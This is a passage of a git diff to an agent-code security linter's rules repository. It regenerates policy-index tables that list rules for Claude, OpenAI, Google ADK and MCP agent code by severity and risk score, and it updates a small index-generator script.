[shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/shell_safety.yaml) | +| 23 | CSDK-110 | Claude SDK | subagent | claude_subagent | Subagent granted the built-in Bash tool | high | 0.90 | 63.0 | [subagent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/subagent_safety.yaml) | +| 24 | CSDK-111 | Claude SDK | subagent | claude_subagent | Subagent granted filesystem-write or web-fetch built-ins | high | 0.85 | 59.5 | [subagent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/subagent_safety.yaml) | +| 25 | CSDK-120 | Claude SDK | agent | claude_agent_definition | TypeScript AgentDefinition sets permissionMode to bypassPermissions | high | 0.90 | 63.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 26 | CSDK-130 | Claude SDK | agent | claude_query_main | TypeScript query() main agent is granted the Bash tool | high | 0.80 | 56.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 27 | CSDK-131 | Claude SDK | agent | claude_query_main | TypeScript query() main agent is granted filesystem-write or web-fetch built-ins | high | 0.75 | 52.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/agent_safety.yaml) | +| 28 | CSDK-201 | Claude SDK | repo | claude_sdk | Project default permission mode bypasses approvals | high | 0.90 | 63.0 | [repo.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo.yaml) | +| 29 | CSDK-202 | Claude SDK | repo | claude_sdk | Session permission mode bypasses approvals | high | 0.90 | 63.0 | [repo.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo.yaml) | +| 30 | CSDK-203 | Claude SDK | repo | claude_sdk | Repo ships Claude Agent SDK code without an agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/claude_sdk/repo_hygiene.yaml) | diff --git a/docs/policy-rationale-doc-template-guide.md b/docs/policy-rationale-doc-template-guide.md index 7927471..45fc8fd 100644 --- a/docs/policy-rationale-doc-template-guide.md +++ b/docs/policy-rationale-doc-template-guide.md @@ -217,7 +217,7 @@ rule's detection scope. | `claude_sdk/network.yaml` | `docs/Policy/claude_sdk/network.md` | | `openai_sdk/agent_safety.yaml` | `docs/Policy/openai_sdk/agent_safety.md` | | `google_adk/tool_definition.yaml` | `docs/Policy/google_adk/tool_definition.md` | -| `mcp/injection.yaml` | `docs/Policy/mcp/injection.md` | +| `mcp/tool_definition.yaml` | `docs/Policy/mcp/tool_definition.md` | Category subdirectories under `docs/Policy/` mirror the repo root exactly. If a new category directory is created, create the matching directory in `docs/Policy/`. @@ -245,8 +245,8 @@ These docs are the canonical format examples. Read one before writing a new doc. | Best for | Doc | |---|---| -| Security rule (Critical) | [Policy/mcp/injection.md](Policy/mcp/injection.md) | +| Security rule (high severity) | [Policy/claude_sdk/code_execution.md](Policy/claude_sdk/code_execution.md) | | Reliability rule with low confidence | [Policy/claude_sdk/idempotency.md](Policy/claude_sdk/idempotency.md) | -| Cross-framework rule | [Policy/catalog/capability_class.md](Policy/catalog/capability_class.md) | +| Capability-class rule shared across SDKs | [Policy/google_adk/shell_safety.md](Policy/google_adk/shell_safety.md) | | Agent-scope rule | [Policy/openai_sdk/agent_safety.md](Policy/openai_sdk/agent_safety.md) | | Cross-reference pattern | [Policy/openai_sdk/tool_definition.md](Policy/openai_sdk/tool_definition.md) | diff --git a/google_adk/POLICY_INDEX.md b/google_adk/POLICY_INDEX.md index 1284c1f..5567496 100644 --- a/google_adk/POLICY_INDEX.md +++ b/google_adk/POLICY_INDEX.md @@ -1,7 +1,7 @@ # Google ADK policy index -22 rules — 11 tool · 10 agent · 1 repo +26 rules — 14 tool · 11 agent · 1 repo Risk score = `severity_weight × confidence × 100` (engine formula; weights: low=0.15, medium=0.40, high=0.70). Higher = worse. @@ -19,13 +19,17 @@ Risk score = `severity_weight × confidence × 100` (engine formula; weights: lo | 10 | ADK-010 | Google ADK | tool | adk_function_tool | Tool body spawns a subprocess | high | 0.90 | 63.0 | [shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/shell_safety.yaml) | | 11 | ADK-011 | Google ADK | tool | adk_function_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.90 | 63.0 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/code_execution.yaml) | | 12 | ADK-012 | Google ADK | tool | adk_function_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/ssrf.yaml) | -| 13 | ADK-101 | Google ADK | agent | adk_llm_agent | LlmAgent has no description | medium | 0.85 | 34.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 14 | ADK-102 | Google ADK | agent | adk_llm_agent | Agent with BashTool has no before_tool_callback | high | 0.85 | 59.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 15 | ADK-103 | Google ADK | agent | adk_llm_agent | Sub-agent is granted BashTool | high | 0.90 | 63.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 16 | ADK-104 | Google ADK | agent | adk_llm_agent | Agent has no safety_settings | medium | 0.75 | 30.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 17 | ADK-105 | Google ADK | agent | adk_llm_agent | Agent uses web search built-in without before_tool_callback | high | 0.85 | 59.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 18 | ADK-106 | Google ADK | agent | adk_llm_agent | Agent has a code_executor but no before_model_callback | high | 0.80 | 56.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 19 | ADK-107 | Google ADK | agent | adk_llm_agent | Agent grants AgentTool but has no before_tool_callback | high | 0.70 | 49.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 20 | ADK-108 | Google ADK | agent | adk_loop_agent | LoopAgent has no max_iterations | medium | 0.70 | 28.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 21 | ADK-110 | Google ADK | agent | adk_llm_agent | Agent fetches web content via UrlContextTool/LoadWebPage without before_tool_callback | medium | 0.70 | 28.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | -| 22 | ADK-201 | Google ADK | repo | google_adk | Google ADK project missing CLAUDE.md | low | 0.90 | 13.5 | [repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/repo_hygiene.yaml) | +| 13 | ADK-013 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool has no description | low | 0.80 | 12.0 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/tool_definition.yaml) | +| 14 | ADK-015 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool body evaluates dynamic code | high | 0.90 | 63.0 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/code_execution.yaml) | +| 15 | ADK-016 | Google ADK | tool | adk_function_tool | TypeScript FunctionTool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/ssrf.yaml) | +| 16 | ADK-101 | Google ADK | agent | adk_llm_agent | LlmAgent has no description | medium | 0.85 | 34.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 17 | ADK-102 | Google ADK | agent | adk_llm_agent | Agent with BashTool has no before_tool_callback | high | 0.85 | 59.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 18 | ADK-103 | Google ADK | agent | adk_llm_agent | Sub-agent is granted BashTool | high | 0.90 | 63.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 19 | ADK-104 | Google ADK | agent | adk_llm_agent | Agent has no safety_settings | medium | 0.75 | 30.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 20 | ADK-105 | Google ADK | agent | adk_llm_agent | Agent uses web search built-in without before_tool_callback | high | 0.85 | 59.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 21 | ADK-106 | Google ADK | agent | adk_llm_agent | Agent has a code_executor but no before_model_callback | high | 0.80 | 56.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 22 | ADK-107 | Google ADK | agent | adk_llm_agent | Agent grants AgentTool but has no before_tool_callback | high | 0.70 | 49.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 23 | ADK-108 | Google ADK | agent | adk_loop_agent | LoopAgent has no max_iterations | medium | 0.70 | 28.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 24 | ADK-109 | Google ADK | agent | adk_llm_agent | TypeScript LlmAgent has no description | medium | 0.85 | 34.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 25 | ADK-110 | Google ADK | agent | adk_llm_agent | Agent fetches web content via UrlContextTool/LoadWebPage without before_tool_callback | medium | 0.70 | 28.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/agent_safety.yaml) | +| 26 | ADK-201 | Google ADK | repo | google_adk | Google ADK project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/google_adk/repo_hygiene.yaml) | diff --git a/mcp/POLICY_INDEX.md b/mcp/POLICY_INDEX.md new file mode 100644 index 0000000..86bec7d --- /dev/null +++ b/mcp/POLICY_INDEX.md @@ -0,0 +1,23 @@ + +# Model Context Protocol policy index + +14 rules — 14 tool + +Risk score = `severity_weight × confidence × 100` (engine formula; weights: low=0.15, medium=0.40, high=0.70). Higher = worse. + +| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | +| -- | ------- | ------- | ----- | ---------- | ---------------------------------------------------------- | -------- | ---------- | ---- | ----------------------------------------------------------------------------------------------------- | +| 1 | MCP-001 | MCP | tool | mcp_tool | Tool has no description | low | 0.90 | 13.5 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | +| 2 | MCP-002 | MCP | tool | mcp_tool | Tool has no type-annotated parameters | medium | 0.85 | 34.0 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | +| 3 | MCP-003 | MCP | tool | mcp_tool | Ambiguous tool name | low | 0.85 | 12.8 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | +| 4 | MCP-004 | MCP | tool | mcp_tool | Network call has no timeout | high | 0.85 | 59.5 | [network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/network.yaml) | +| 5 | MCP-005 | MCP | tool | mcp_tool | Path parameter used in I/O without validation | high | 0.70 | 49.0 | [path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/path_safety.yaml) | +| 6 | MCP-006 | MCP | tool | mcp_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/error_handling.yaml) | +| 7 | MCP-007 | MCP | tool | mcp_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/idempotency.yaml) | +| 8 | MCP-008 | MCP | tool | mcp_tool | Tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/ssrf.yaml) | +| 9 | MCP-009 | MCP | tool | mcp_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.85 | 59.5 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/code_execution.yaml) | +| 10 | MCP-010 | MCP | tool | mcp_tool | Tool body spawns a subprocess | high | 0.70 | 49.0 | [shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/shell_safety.yaml) | +| 11 | MCP-011 | MCP | tool | mcp_tool | TypeScript MCP tool has no description | low | 0.85 | 12.8 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/tool_definition.yaml) | +| 12 | MCP-012 | MCP | tool | mcp_tool | TypeScript MCP tool spawns a subprocess | high | 0.70 | 49.0 | [shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/shell_safety.yaml) | +| 13 | MCP-013 | MCP | tool | mcp_tool | TypeScript MCP tool fetches a caller-controlled URL (SSRF) | high | 0.60 | 42.0 | [ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/ssrf.yaml) | +| 14 | MCP-014 | MCP | tool | mcp_tool | TypeScript MCP tool evaluates dynamic code | high | 0.90 | 63.0 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/mcp/code_execution.yaml) | diff --git a/openai_sdk/POLICY_INDEX.md b/openai_sdk/POLICY_INDEX.md index 6896204..3c7b9b5 100644 --- a/openai_sdk/POLICY_INDEX.md +++ b/openai_sdk/POLICY_INDEX.md @@ -1,38 +1,41 @@ # OpenAI Agents SDK policy index -29 rules — 19 tool · 8 agent · 2 repo +32 rules — 21 tool · 9 agent · 2 repo Risk score = `severity_weight × confidence × 100` (engine formula; weights: low=0.15, medium=0.40, high=0.70). Higher = worse. -| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | -| -- | ------- | ---------- | ----- | ---------------------------------- | -------------------------------------------------------------------------- | -------- | ---------- | ---- | -------------------------------------------------------------------------------------------------------------- | -| 1 | OAI-001 | OpenAI SDK | tool | openai_tool | Tool function has no docstring | low | 0.90 | 13.5 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | -| 2 | OAI-002 | OpenAI SDK | tool | openai_tool | Tool function has no type-annotated parameters | medium | 0.85 | 34.0 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | -| 3 | OAI-003 | OpenAI SDK | tool | openai_tool | Tool sets strict_mode=False | medium | 0.95 | 38.0 | [decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | -| 4 | OAI-004 | OpenAI SDK | tool | openai_tool | Tool has no failure_error_function | medium | 0.70 | 28.0 | [decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | -| 5 | OAI-005 | OpenAI SDK | tool | openai_tool | Network call has no timeout | high | 0.85 | 59.5 | [network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 6 | OAI-006 | OpenAI SDK | tool | openai_tool | Tool accepts path without normalization | high | 0.70 | 49.0 | [path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/path_safety.yaml) | -| 7 | OAI-007 | OpenAI SDK | tool | openai_tool | Ambiguous tool name | low | 0.90 | 13.5 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | -| 8 | OAI-008 | OpenAI SDK | tool | openai_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/error_handling.yaml) | -| 9 | OAI-009 | OpenAI SDK | tool | openai_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/idempotency.yaml) | -| 10 | OAI-010 | OpenAI SDK | tool | openai_tool | Tool function prints to stdout for diagnostics | low | 0.65 | 9.8 | [observability.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/observability.yaml) | -| 11 | OAI-011 | OpenAI SDK | tool | openai_tool | urllib network call has no timeout | high | 0.85 | 59.5 | [network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 12 | OAI-012 | OpenAI SDK | tool | openai_tool | Tool body spawns a subprocess | high | 0.90 | 63.0 | [shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/shell_safety.yaml) | -| 13 | OAI-013 | OpenAI SDK | tool | openai_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.90 | 63.0 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/code_execution.yaml) | -| 14 | OAI-014 | OpenAI SDK | tool | openai_tool | Privileged tool has no needs_approval gate | high | 0.70 | 49.0 | [approvals.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/approvals.yaml) | -| 15 | OAI-015 | OpenAI SDK | tool | openai_tool | Tool sets failure_error_function=None | high | 0.85 | 59.5 | [decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | -| 16 | OAI-016 | OpenAI SDK | tool | openai_tool | TypeScript tool fetch call has no AbortSignal timeout | high | 0.60 | 42.0 | [network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 17 | OAI-017 | OpenAI SDK | tool | openai_tool | TypeScript tool body calls eval / new Function on dynamic input | high | 0.90 | 63.0 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/code_execution.yaml) | -| 18 | OAI-018 | OpenAI SDK | tool | openai_tool | Tool builds outbound URL from non-literal value | medium | 0.55 | 22.0 | [network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | -| 19 | OAI-019 | OpenAI SDK | tool | openai_tool | TypeScript mutating tool has no idempotency key | medium | 0.50 | 20.0 | [idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/idempotency.yaml) | -| 20 | OAI-101 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent has no input_guardrails AND wires shell or filesystem-touching tools | high | 0.85 | 59.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 21 | OAI-102 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent uses tool_use_behavior="stop_on_first_tool" | high | 0.95 | 66.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 22 | OAI-103 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | tool_choice="required" combined with reset_tool_choice=False | high | 0.95 | 66.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 23 | OAI-104 | OpenAI SDK | agent | openai_agent | Raw Agent (not SandboxAgent) wires shell or filesystem-touching tools | medium | 0.75 | 30.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 24 | OAI-106 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires MCP servers without input_guardrails | high | 0.90 | 63.0 | [mcp_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/mcp_safety.yaml) | -| 25 | OAI-109 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent uses WebSearchTool without input_guardrails | high | 0.85 | 59.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 26 | OAI-110 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires a content-fetching tool without output_guardrails | high | 0.60 | 42.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | -| 27 | OAI-111 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires a privileged hosted tool without needs_approval | high | 0.75 | 52.5 | [approvals.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/approvals.yaml) | -| 28 | OAI-201 | OpenAI SDK | repo | openai_agents | Project uses default OpenAI tracing | medium | 0.80 | 32.0 | [tracing.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tracing.yaml) | -| 29 | OAI-202 | OpenAI SDK | repo | openai_agents | OpenAI Agents project missing CLAUDE.md | low | 0.90 | 13.5 | [repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/repo_hygiene.yaml) | +| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | +| -- | ------- | ---------- | ----- | ---------------------------------- | ----------------------------------------------------------------------------- | -------- | ---------- | ---- | -------------------------------------------------------------------------------------------------------------- | +| 1 | OAI-001 | OpenAI SDK | tool | openai_tool | Tool function has no docstring | low | 0.90 | 13.5 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | +| 2 | OAI-002 | OpenAI SDK | tool | openai_tool | Tool function has no type-annotated parameters | medium | 0.85 | 34.0 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | +| 3 | OAI-003 | OpenAI SDK | tool | openai_tool | Tool sets strict_mode=False | medium | 0.95 | 38.0 | [decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | +| 4 | OAI-004 | OpenAI SDK | tool | openai_tool | Tool has no failure_error_function | medium | 0.70 | 28.0 | [decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | +| 5 | OAI-005 | OpenAI SDK | tool | openai_tool | Network call has no timeout | high | 0.85 | 59.5 | [network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 6 | OAI-006 | OpenAI SDK | tool | openai_tool | Tool accepts path without normalization | high | 0.70 | 49.0 | [path_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/path_safety.yaml) | +| 7 | OAI-007 | OpenAI SDK | tool | openai_tool | Ambiguous tool name | low | 0.90 | 13.5 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | +| 8 | OAI-008 | OpenAI SDK | tool | openai_tool | Tool raises exceptions without a structured error contract | medium | 0.60 | 24.0 | [error_handling.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/error_handling.yaml) | +| 9 | OAI-009 | OpenAI SDK | tool | openai_tool | Mutating tool has no idempotency key | medium | 0.55 | 22.0 | [idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/idempotency.yaml) | +| 10 | OAI-010 | OpenAI SDK | tool | openai_tool | Tool function prints to stdout for diagnostics | low | 0.65 | 9.8 | [observability.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/observability.yaml) | +| 11 | OAI-011 | OpenAI SDK | tool | openai_tool | urllib network call has no timeout | high | 0.85 | 59.5 | [network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 12 | OAI-012 | OpenAI SDK | tool | openai_tool | Tool body spawns a subprocess | high | 0.90 | 63.0 | [shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/shell_safety.yaml) | +| 13 | OAI-013 | OpenAI SDK | tool | openai_tool | Tool body calls eval/exec/compile on dynamic input | high | 0.90 | 63.0 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/code_execution.yaml) | +| 14 | OAI-014 | OpenAI SDK | tool | openai_tool | Privileged tool has no needs_approval gate | high | 0.70 | 49.0 | [approvals.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/approvals.yaml) | +| 15 | OAI-015 | OpenAI SDK | tool | openai_tool | Tool sets failure_error_function=None | high | 0.85 | 59.5 | [decorator_config.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/decorator_config.yaml) | +| 16 | OAI-016 | OpenAI SDK | tool | openai_tool | TypeScript tool fetch call has no AbortSignal timeout | high | 0.60 | 42.0 | [network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 17 | OAI-017 | OpenAI SDK | tool | openai_tool | TypeScript tool body calls eval / new Function on dynamic input | high | 0.90 | 63.0 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/code_execution.yaml) | +| 18 | OAI-018 | OpenAI SDK | tool | openai_tool | Tool builds outbound URL from non-literal value | medium | 0.55 | 22.0 | [network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 19 | OAI-019 | OpenAI SDK | tool | openai_tool | TypeScript mutating tool has no idempotency key | medium | 0.50 | 20.0 | [idempotency.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/idempotency.yaml) | +| 20 | OAI-022 | OpenAI SDK | tool | openai_tool | TypeScript tool has no description | low | 0.85 | 12.8 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tool_definition.yaml) | +| 21 | OAI-024 | OpenAI SDK | tool | openai_tool | TypeScript tool builds outbound URL from a non-literal value | medium | 0.60 | 24.0 | [network.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/network.yaml) | +| 22 | OAI-101 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent has no input_guardrails AND wires shell or filesystem-touching tools | high | 0.85 | 59.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 23 | OAI-102 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent uses tool_use_behavior="stop_on_first_tool" | high | 0.95 | 66.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 24 | OAI-103 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | tool_choice="required" combined with reset_tool_choice=False | high | 0.95 | 66.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 25 | OAI-104 | OpenAI SDK | agent | openai_agent | Raw Agent (not SandboxAgent) wires shell or filesystem-touching tools | medium | 0.75 | 30.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 26 | OAI-105 | OpenAI SDK | agent | openai_agent | TypeScript agent wires a content-fetching hosted tool without inputGuardrails | high | 0.80 | 56.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 27 | OAI-106 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires MCP servers without input_guardrails | high | 0.90 | 63.0 | [mcp_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/mcp_safety.yaml) | +| 28 | OAI-109 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent uses WebSearchTool without input_guardrails | high | 0.85 | 59.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 29 | OAI-110 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires a content-fetching tool without output_guardrails | high | 0.60 | 42.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/agent_safety.yaml) | +| 30 | OAI-111 | OpenAI SDK | agent | openai_agent, openai_sandbox_agent | Agent wires a privileged hosted tool without needs_approval | high | 0.75 | 52.5 | [approvals.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/approvals.yaml) | +| 31 | OAI-201 | OpenAI SDK | repo | openai_agents | Project uses default OpenAI tracing | medium | 0.80 | 32.0 | [tracing.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/tracing.yaml) | +| 32 | OAI-202 | OpenAI SDK | repo | openai_agents | OpenAI Agents project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/openai_sdk/repo_hygiene.yaml) | diff --git a/tools/gen_index.py b/tools/gen_index.py index f188bca..6b10aea 100644 --- a/tools/gen_index.py +++ b/tools/gen_index.py @@ -32,12 +32,13 @@ GH_BASE = "https://github.com/trustabl/trustabl-rules/blob/main/" GENERATED_MARKER = "" -SDK_ORDER = ["claude_sdk", "openai_sdk", "google_adk"] -SDK_LABEL = {"claude_sdk": "Claude SDK", "openai_sdk": "OpenAI SDK", "google_adk": "Google ADK"} +SDK_ORDER = ["claude_sdk", "openai_sdk", "google_adk", "mcp"] +SDK_LABEL = {"claude_sdk": "Claude SDK", "openai_sdk": "OpenAI SDK", "google_adk": "Google ADK", "mcp": "MCP"} SDK_FULL = { "claude_sdk": "Claude Agent SDK", "openai_sdk": "OpenAI Agents SDK", "google_adk": "Google ADK", + "mcp": "Model Context Protocol", } SCOPE_ORDER = ["tool", "agent", "subagent", "repo"] @@ -56,9 +57,10 @@ MASTER_PREAMBLE = """# Policy 